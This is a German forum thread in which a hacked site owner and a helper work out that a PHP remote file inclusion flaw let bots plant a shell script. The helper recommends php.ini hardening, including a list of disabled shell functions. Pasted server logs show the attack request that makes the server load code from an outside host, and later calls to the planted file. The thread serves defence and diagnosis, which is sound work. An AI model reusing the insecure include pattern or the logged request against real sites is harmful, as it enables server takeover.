Server wurde gehackt

[Neurodeamon]

Wenn Rootserver: Neu aufsetzen wäre das Sicherste. Beim Einrichten würde ich auch die vorhanden PHP Sicherheitsmechanismen nutzen:

Globale Variablen deaktivieren

register_globals = off

Externe Daten mit PHP nachladen verbieten

allow_url_fopen = off

Jeden User in seinem Verzeichnis festnageln (kein Zugriff auf ausserhalb)

open_basedir = /PFAD/ZU/USER/

Systembefehle nicht mehr mit PHP ausführen lassen

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

Safemode ist nur eingeschränkt nutzbar (man müsste theoretisch alle Skripte testen ob Sie noch funktionieren, sobald man den safemode aktiviert:

safe_mode =

Aber wenn ich alles lösche dürfte ich doch nichts mehr befürchten oder?

Wenn der Server gehackt wurde nützt es manchmal nichts wenn man lediglich die betroffenen Dateien löscht, manche Fieslinge nisten sich im System ein!

 

[toohappy]

also es ist kein rootserver. Aber ich schaue mal was für Einstellungen auf dem Server sind und gegebenenfalls kann ich ja den Webspace-provider fragen ob er sie ändert, was er in der Regel bis jetzt immer gemacht hat.

Gruß
toohappy

 

[Neurodeamon]

also es ist kein rootserver. Aber ich schaue mal was für Einstellungen auf dem Server sind und gegebenenfalls kann ich ja den Webspace-provider fragen ob er sie ändert, was er in der Regel bis jetzt immer gemacht hat.

Wenn man Glück hat kann man aber auch ohne Rootzugriff einige Einstellungen per .htaccess vornehmen (muss in der php.ini eingestellt sein).

Meist funktioniert das Einstellen von register_globals.

 

[toohappy]

also so sind die Einstellungen

register_globals = on

allow_url_fopen = on

disable_functions	= no value

safe_mode	 Local value = On	Master value = Off

register_globals	= On

Wie kann ich überprüfen ob jetzt was bei bei dem register_globals über die .htaccess Datei verändert wurde?

Gruß
toohappy

 

[Neurodeamon]

Die einfachste Methode ist eine php-Datei mit dem Inhalt:

<?php
phpinfo();
?>

PHP listet alle Einstellungen auf.

Und Du kannst natürlich ein kleines Skript schreiben:

<?php
echo $whatever;
?>

Dann rufst Du die Datei im Browser auf und hängst an die URL an:

www.meinedomain.de/phpdatei.php?whatever=ichbineintest

Wenn jetzt "ichbineintest" ausgegeben wird, ist die Einstellung noch auf "on", wenn keine Ausgabe erfolgt, dann steht sie auf "off". Die Variablen müssen jetzt explizit abgefragt werden: Das ginge im Beispiel mit $_GET['whatever'] und Formulardaten die per POST versendet werden fragt man mit $_POST['whatever'] ab, Session Variablen mit $_SESSION['whatever'].

Zum lernen wie man sicher mit PHP programmiert ein paar Links:
Secure PHP Code 1
Secure PHP Code 2

 

[toohappy]

So also mein Hoster hat die nötigen Einstellungen soweit es möglich war angenommen. Also
register_globals = off und allow_url_fopen = off. Die index.php hab ich auch geändert und es dürfte soweit keine Probleme mehr geben. Da jetzt eine neue Methode versucht wurde, hab ich nochmal die alten log-dateien durchforstet. Ein paar neue logs schauen so aus

63.87.115.172 - - [11/May/2008:19:28:54 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.1" 404 8571 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
193.147.184.49 - - [11/May/2008:19:30:20 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.1" 404 8592 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.78.195.202 - - [11/May/2008:19:30:49 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.175.252.4 - - [11/May/2008:19:31:31 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.0" 404 8503 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

ok da dort der Code 404 steht heißt das für mich, dass die Seite nicht aufgerufen werden kann. Was soweit ja gut ist.

Allerdings hab ich jetzt in den alten logs nachgeschaut und das hier gefunden.

202.154.224.53 - - [29/Apr/2008:23:29:05 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.0" 200 583 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Diesem Auszug nach war die Datei wohl vorhanden und wurde auch ausgeführt. Den Beschreibungen nach, führt diese Datei nichts gutes im Schilde. Da ich sowieso alles gelöscht hatte ist die Datei nicht mehr vorhanden. Meine Frage ist jetzt ob es wirklich an dem "include $site.".php"; " gelegen hat oder vielleicht doch an was anderem? Da der Ordner /gast/images/smilies/ vom Gästebuch ist kommt mir das alles spanisch vor. Oder wurde dieser Ordner ausgewählt weil er einer der wenigen ist, der die Einstellung chmod 777 besitzt?

 

[toohappy]

Eine Frage kann ich jetzt selber beantworten es lag wohl am "include $site.".php";"

123.236.37.122 - - [03/Apr/2008:12:27:43 +0200] "GET /index.php?site=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Ffuwep%2Fa%2F HTTP/1.0" 200 5117 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
63.209.206.122 - - [03/Apr/2008:12:27:56 +0200] "POST /gast/images/smilies/namogofer.php HTTP/1.0" 200 595 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Nach diesem Aufruf war die namogofer.php vorhanden. Aber warum wurde es in /gast/images/smilies abgelegt?

Gruß
Plat

 

[Neurodeamon]

Nach diesem Aufruf war die namogofer.php vorhanden. Aber warum wurde es in /gast/images/smilies abgelegt?

Du bist wohl Opfer des am weitest verbreiteten Botsystems geworden. So ziemlich jeder Versuch bei meinem Firmenserver läßt sich auf diesen Exploit-Versuch zurückführen. Das System arbeitet automatisiert und verwendet bereits gehackte Server. Die Pfade variieren und werden wohl per Zufall abgelegt.

Da hat sich sogar jemand die Mühe gemacht etwas nachzuforschen:

Chasing the Just_a_test_exploit

Im Großen und Ganzen werden dort auch die von mir empfohlenen PHP-Einstellungen aufgeführt.

 

[toohappy]

ja von der Seite hatte ich auch meine Informationen. Hier noch ein Link den ich auch noch recht nützlich fand. Dort sind auch noch ein paar hilfreiche Tips wie man sich davor schützen kann.

Gruß
toohappy